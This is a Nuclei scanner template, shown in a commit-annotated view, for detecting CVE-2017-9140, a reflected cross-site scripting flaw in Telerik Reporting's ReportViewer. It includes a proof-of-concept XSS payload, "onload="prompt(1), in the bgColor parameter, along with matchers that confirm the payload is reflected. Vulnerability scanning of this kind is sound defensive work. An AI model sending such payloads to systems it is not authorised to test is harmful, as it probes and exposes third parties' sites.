nuclei-templates/cves/2017/CVE-2017-9140.yaml

32 lines
1.1 KiB
YAML
Raw Normal View History

2021-06-09 13:10:47 +00:00
id: CVE-2017-9140
info:
2021-06-09 16:07:22 +00:00
name: Reflected XSS - Telerik Reporting Module
2021-06-09 13:10:47 +00:00
author: dhiyaneshDk
severity: medium
2021-06-09 16:07:22 +00:00
tags: cve,cve2017,xss,telerik
description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
2021-06-09 13:10:47 +00:00
reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-9140
cwe-id: CWE-79
2021-06-09 13:10:47 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'
2021-06-09 16:07:22 +00:00
matchers-condition: and
2021-06-09 13:10:47 +00:00
matchers:
2021-06-09 16:07:22 +00:00
- type: status
status:
- 200
2021-06-09 13:10:47 +00:00
- type: word
words:
2021-06-09 16:07:22 +00:00
- '#000000"onload="prompt(1)'
- 'Telerik.ReportViewer.axd?name=Resources'
2021-06-09 13:10:47 +00:00
condition: and